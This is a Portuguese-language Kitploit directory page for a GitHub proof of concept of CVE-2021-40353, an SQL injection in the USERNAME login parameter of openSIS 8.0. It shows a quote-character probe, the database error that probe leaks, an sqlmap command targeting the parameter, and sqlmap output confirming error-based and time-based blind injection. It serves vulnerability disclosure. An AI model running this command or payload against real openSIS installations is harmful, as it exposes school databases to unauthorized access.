Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/5qu1n7/cve-2021-40353
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança de Banco de Dados
GitHub5qu1n7/cve-2021-40353

CVE-2021-40353

CVE-2021-40353 openSIS 8.0 Vulnerabilidade de Injeção de SQL

Ver Repositório
52há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-40353

CVE-2021-40353 Vulnerabilidade de Injeção SQL no openSIS 8.0 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353

Existe uma vulnerabilidade de injeção SQL na versão 8.0 do openSIS quando MySQL ou MariaDB é usado como banco de dados da aplicação. Um atacante pode então emitir o comando SQL através do parâmetro USERNAME.

Página PHP vulnerável:

index.php – parâmetro USERNAME

Payload vulnerável ' – produzirá um erro com informações do banco de dados " – não produz o erro

Erro

Data:

08/31/2021 03:16:22

Aviso de Falha:

Falha na Execução do DB

SQL: UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'') Traceback: C:\xampp\htdocs\opensis\index.php at 502 Informação Adicional: Você tem um erro na sua sintaxe SQL; verifique o manual que corresponde à versão do seu servidor MariaDB para a sintaxe correta perto de ''user1'')' na linha 1 Data:

08/31/2021 03:16:22

root@kitploit:~
O openSIS encontrou um erro que pode ter resultado de qualquer um dos seguintes:

Entrada de dados inválida
Erro SQL do banco de dados
Erro de programa

Por favor, tire esta captura de tela e envie-a ao seu representante openSIS para depuração e resolução.

sqlmap -r post_opensis -p USERNAME

[09:38:19] [INFO] POST parameter 'USERNAME' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [09:38:19] [INFO] testing 'MySQL inline queries' [09:38:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [09:38:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [09:38:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:38:46] [INFO] POST parameter 'USERNAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable

Descoberto por Brian Lowe, Agosto de 2021

Baixar ferramenta